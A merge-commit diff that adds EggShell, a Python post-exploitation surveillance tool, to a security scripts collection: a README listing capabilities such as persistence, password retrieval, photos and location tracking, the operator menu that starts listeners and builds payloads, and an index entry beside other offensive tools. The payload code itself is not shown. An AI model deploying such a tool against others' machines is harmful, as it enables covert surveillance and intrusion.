Merge pull request #439 from shraddha761/eggshell

EggShell python script

Author: avinashkranjan

EggShell/Readme.md

@@ -0,0 +1,5 @@
+# EggShell
+
+
+EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.
+

EggShell/eggshell.py

@@ -0,0 +1,135 @@
+from modules import server
+from modules import helper as h
+import sys, os
+
+
+#banner
+class EggShell:
+    def __init__(self):
+        h.generate_keys()
+        self.server = server.Server()
+        if len(sys.argv) == 2 and sys.argv[1] == "debug":
+            self.server.debug = True
+        else:
+            self.server.debug = False
+        self.payloads = self.import_payloads() 
+        self.banner_text = h.GREEN+"""          `"""+h.COLOR_INFO+"""
+                 
+"""+h.WHITE+"\nVersion: 3.1.1\n"+h.ENDC
+        self.main_menu_text = h.WHITE+"-"*40+"\n"+"""Menu:\n
+    1): Start Server
+    2): Start MultiHandler
+    3): Create Payload
+    4): Exit
+""" + "\n"+h.NES
+
+
+    # Actions
+    def print_payload(self,payload,number_option):
+        print " " * 4 + str(number_option) + "): " + payload.name
+
+
+    def start_single_server(self):
+        if not self.server.set_host_port():
+            return
+        self.server.start_single_handler()
+
+
+    def start_multi_handler(self):
+        if not self.server.set_host_port():
+            return
+        self.server.start_multi_handler()
+
+
+    def prompt_run_server(self):
+        if raw_input(h.NES+"Start Server? (Y/n): ") == "n":
+            return
+        else:
+            if raw_input(h.NES+"MultiHandler? (y/N): ") == "y":
+                self.server.start_multi_handler()
+            else:
+                self.server.start_single_handler()
+
+
+    def import_payloads(self):
+        path = "modules/payloads"
+        sys.path.append(path)
+        modules = dict()
+        for mod in os.listdir(path):
+            if mod == '__init__.py' or mod[-3:] != '.py':
+                continue
+            else:
+                m = __import__(mod[:-3]).payload()
+                modules[m.name] = m
+        return modules
+
+
+    def exit_menu(self):
+        exit()
+
+
+    def choose_payload(self):
+        print h.WHITE+"-"*40+h.ENDC
+        print "Payloads:\n"
+        number_option = 1
+        for key in self.payloads:
+            payload = self.payloads[key]
+            self.print_payload(payload,number_option)
+            number_option += 1
+        print ""
+        while 1:
+            try:
+                # choose payload
+                option = raw_input(h.info_general_raw("Choose an payload> "))
+                if not option:
+                  continue
+                selected_payload = self.payloads[self.payloads.keys()[int(option) - 1]]
+                # set host and port
+                self.server.set_host_port()
+                # generate payload
+                selected_payload.run(self.server)
+                #run
+                self.prompt_run_server()
+                break
+            except KeyboardInterrupt:
+                break
+            except Exception as e:
+                print e
+                break
+
+
+    def menu(self,err=""):
+        while 1:
+            try:
+                h.clear()
+                if err:
+                    print err
+                if self.server.debug:
+                    print "Debug On"
+                sys.stdout.write(self.banner_text)
+                option = raw_input(self.main_menu_text)
+                choose = {
+                    "1" : self.start_single_server,
+                    "2" : self.start_multi_handler,
+                    "3" : self.choose_payload,
+                    "4" : self.exit_menu
+                }
+                try:
+                    choose[option]()
+                    self.menu()
+                except KeyError:
+                    if option:
+                        self.menu("Oops: " + option + " is not an option")
+                    else:
+                        self.menu()
+                except KeyboardInterrupt:
+                    continue
+                    # TODO: quit socket listener
+            except KeyboardInterrupt:
+                print "\nBye!"
+                exit()
+
+
+if __name__ == "__main__":
+    eggshell = EggShell()
+    eggshell.menu()

SCRIPTS.md

@@ -74,6 +74,8 @@
  | [Take me](./dotdotslash/)
  | 50\.     | HackerEnv | hackerEnv is an automation tool that quickly and easily sweep IPs and scan ports, vulnerabilities and exploit them. Then, it hands you an interactive shell for further testing. Also, it generates HTML and docx reports. It uses other tools such as nmap, nikto, metasploit and hydra. Works in kali linux and Parrot OS.
  | [Take me](./hackerenv/)
+| 51\.     | EggShell | EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.
+ | [Take me](./EggShell/)
  | 51\.     | CrossLinked | CrossLinked is a LinkedIn enumeration tool that uses search engine scraping to collect valid employee names from an organization. This technique provides accurate results without the use of API keys, credentials, or accessing LinkedIn directly!
  | [Take me](./CrossLinked/)
 | 47\.  |Flooder_Sniffer_Spoofer | These scripts utilize various libraries such as subprocess, socket, struct, scapy, and argparse to implement their respective functionalities. | [Take me](./Flooder_Sniffer_Spoofer/)